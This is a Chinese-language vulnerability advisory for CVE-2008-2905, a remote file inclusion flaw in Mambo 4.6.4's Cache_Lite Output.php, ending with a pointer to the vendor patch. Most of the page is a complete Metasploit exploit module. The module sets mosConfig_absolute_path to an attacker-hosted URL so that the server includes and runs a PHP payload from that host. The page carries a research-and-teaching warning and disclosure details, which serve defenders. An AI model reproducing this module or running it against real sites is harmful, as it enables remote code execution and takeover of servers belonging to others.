发布日期：2008-06-14
更新日期：2009-11-02

受影响系统：

Mambo Mambo Open Source 4.6.4

描述：

---

BUGTRAQ  ID: 29716
CVE ID: CVE-2008-2905

Mambo（也被称为Joomla）是一款开放源代码的WEB内容管理系统。

Mambo的 Cache_Lite类在实现上存在远程文件包含漏洞，可被利用控制应用和下层系统。

<*来源：irk4z@yahoo.pl
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

irk4z@yahoo.pl （）提供了如下测试方法：

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer::PHPInclude

    def initialize(info = {})
        super(update_info(info,    
            'Name'           => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
            'Description'    => %q{
                    This module exploits a remote file inclusion vulnerability in
                    includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
                    4.6.4 and earlier.
            },
            'Author'         => [ 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision:$',
            'References'     =>
                [
                    [ 'CVE', '2008-2905' ],
                    [ 'BID', '29716' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'ConnectionType' => 'find',
                        },
                    'Space'       => 32768,
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Jun 14 2008',
            'DefaultTarget' => 0))
            
            register_options(
                [
                    OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
                ], self.class)
    end

    def php_exploit

        timeout = 0.01
        uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
        print_status("Trying uri #{uri}")

        response = send_request_raw( {
                'global' => true,
                'uri' => uri,
            },timeout)

        if response and response.code != 200
            print_error("Server returned non-200 status code (#{response.code})")
        end
        
        handler
    end

end

建议：

---

厂商补丁：

Mambo
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://sourceforge.net/projects/mambo

浏览次数：2068
严重程度：0（网友投票）